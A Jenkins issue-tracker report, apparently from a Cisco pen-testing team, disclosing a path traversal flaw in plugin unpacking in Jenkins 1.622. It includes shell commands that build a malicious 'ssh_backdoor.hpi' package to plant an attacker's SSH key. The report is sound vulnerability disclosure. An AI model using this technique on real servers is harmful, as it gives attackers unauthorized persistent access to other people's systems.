Uploaded image for project: 'Jenkins'
  1. Jenkins
  2. JENKINS-32778

Jenkins plugin installation path traversal vulnerability

XMLWordPrintable

    • Icon: Improvement Improvement
    • Resolution: Fixed
    • Icon: Minor Minor
    • core
    • Platforms: Jenkins
      Versions: 1.622

      Submitting as delegate for a Cisco pen-testing team
      A vulnerability in the package installation process of Jenkins could all an authenticated, remote attacker to affect a path traversal attack.

      The vulnerability is due to unsafe unpacking operations. An attacker could exploit this vulnerability by crafting a malicious plugin package and installing it themselves, or tricking a victim to install it on their Jenkin's instance. An exploit could allow the attacker to write or overwrite files with elevated privileges, which could allow backdoor access, or a denial of service (DoS) condition.

      Headline: Path traversal during Jenkins plugin installation
      Platforms: Jenkins
      Versions: 1.622
      CWE Tags: CWE-25, CWE-541

      Jenkins allows administrators to install plugins that extend the core
      functionality of the system. Plugins are distributed in a single-file package
      (essentially a 'zip'/'jar' file) that is expanded at installation time. The
      process that expands plugin packages during installation contains a path
      traversal vulnerability that allows a malicious plugin package to write files to
      arbitrary locations on the underlying filesystem. This includes creating new
      files and directories and overwriting existing files.

      For example, a plugin package could overwrite Jenkins system configuration files
      or cryptographic secrets. It could create new users or jobs by writing new
      user/job configuration files. It could even create/overwrite an OS user's
      '.ssh/authorized_keys' file, thus creating a backdoor that may allow the
      attacker to SSH into the Jenkins server.

      Consider the following shell transcript illustrating how an attacker could
      create a malicious package that installs an attacker controlled SSH key.

      $ mkdir -p .ssh one/two

      $ ssh-keygen -t rsa -b 1024 -N "" -C jenkins -f .ssh/jenkins.id_rsa
      Generating public/private rsa key pair.
      Your identification has been saved in ./jenkins.id_rsa.
      Your public key has been saved in ./jenkins.id_rsa.pub.
      The key fingerprint is:
      96:6b:2e:0a:bb:07:d5:8d:97:b7:70:bb:4e:65:3f:bb jenkins
      The key's randomart image is:
      -[ RSA 1024]---

       
       
      . o .
      . o =.o
      . .S+ oo
      . . .oo .
      .. o .. o
      o. .o .. o
      oo.. .... E.

      -----------------

      $ ln -s jenkins.id_rsa.pub .ssh/authorized_keys

      $ jar cvf ssh_backdoor.hpi -C one/two/ ../../.ssh/authorized_keys
      added manifest
      adding: ../../.ssh/authorized_keys(in = 221) (out= 198)(deflated 10%)

      Note, the 'ssh_backdoor.hpi' plugin described above has been confirmed to
      successfully create an SSH backdoor on Jenkins 1.622 running on Ubuntu Linux
      (default installation via aptitude). Obviously, differences in installation
      paths and filesystem layout could affect the applicability of this example to
      other platforms.

      Clearly the behavior described above should not be permitted. To protect
      against such attacks, Jenkins developers should ensure that plugins are
      unpackaged and installed in isolated portions of the filesystem.

      References:
      http://cwe.mitre.org/data/definitions/25.html
      http://cwe.mitre.org/data/definitions/641.html

            Unassigned Unassigned
            crlorent Craig Lorentzen
            Votes:
            0 Vote for this issue
            Watchers:
            6 Start watching this issue

              Created:
              Updated:
              Resolved: